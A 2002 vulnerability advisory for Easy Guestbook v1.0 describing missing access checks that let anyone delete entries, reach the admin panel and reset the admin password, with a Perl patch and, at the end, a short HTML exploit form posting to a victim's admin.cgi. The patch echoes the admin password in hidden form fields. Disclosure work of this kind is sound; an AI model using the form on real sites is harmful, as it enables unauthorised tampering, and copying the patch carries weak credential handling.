AresU Advisory 
19/July/2002 

Easy Guestbook Vulnerabilities 

Severity        : High (Possible to edit member homepage) 
Systems Affected: Easy Guestbook v1.0 
Vendor URL      : http://www.easyscripts.co.uk 
Vuln Type       : It does not use Access Validation to delete the entries and login as Admin Control. 
Author          : AresU 
Greetz to       : Bosen, Tioeuy, eF73, SakitJiwa, nimdA, Br0374l, FreshFirst, Algorithm, Mr.Padang 

Summary 
======= 
1) Everyone can delete the entries and login as Admin Control. 
2) Everyone can reconfigure Guestbook when they open config.cgi and change Admin Password. 

Solution 
======== 
1) Add Access Validation on "delete_message" function and "start" function. 

   Add admin.cgi with this code: 
   sub login_verify 
   { 
        chomp($FORM{'login_username'}); 
        chomp($FORM{'login_password'}); 
        if (!($FORM{'login_username'} eq $username && $FORM{'login_password'} eq $password)) 
        { 
          dienice("Sorry, but you have entered an invalid username or password.  Please press the 'back' button on your browser to return to the Login Screen."); 
        } 
   } 
  
   And on the first line of "delete_message" function and "start" function add this: 
   &login_verify; 

   And on the "start" function add this code in the <FORM>: 
   <input type="hidden" name="login_username" value="$FORM{'login_username'}"> 
   <input type="hidden" name="login_password" value="$FORM{'login_password'}"> 
   
2) Delete config.cgi after you finish configure the Guestbook.   


Acknowledgments 
=============== 
Vulnerability discovery, exploit code, and advisory by AresU 

Vendor Response 
=============== 
Vendor has been contacted for about 7 days but they still didn't respond yet. 

Exploit Code 
============ 

<!-- 
Easy Guestbook Vulnerabilities 

Date      : July 19, 2002 
Severity  : Medium (Possible to delete the entries) 
Systems Affected: 
        Easy Guestbook v1.0 

Vendor URL: http://www.easyscripts.co.uk 
Vuln Type : It does not use Access Validation to delete the entries and login as Admin Control. 
Author    : AresU 
Greetz to : Bosen, Tioeuy, eF73, SakitJiwa, nimdA, FreshFirst, Algorithm, Mr.Padang 
--> 

<html> 
<body> 
<h1>Easy Guestbook v1.0 Vulnerabilities</h1> 
<form method="POST" action="http://victim/guestbook/admin.cgi"> 
Delete No. of Entries in Guestbook: <input type="text" value="" name="function" size="5"> <input type="submit" value="Delete Message" name="delete_message" style="font-size: 10pt; font-family: verdana; font-weight: bold"><br><hr> 
Open Administration Guestbook: <input type="submit" value="Back to Admin" name="back_to_admin" style="color: #800080; font-weight: bold"> 
</form> 
</body> 
</html>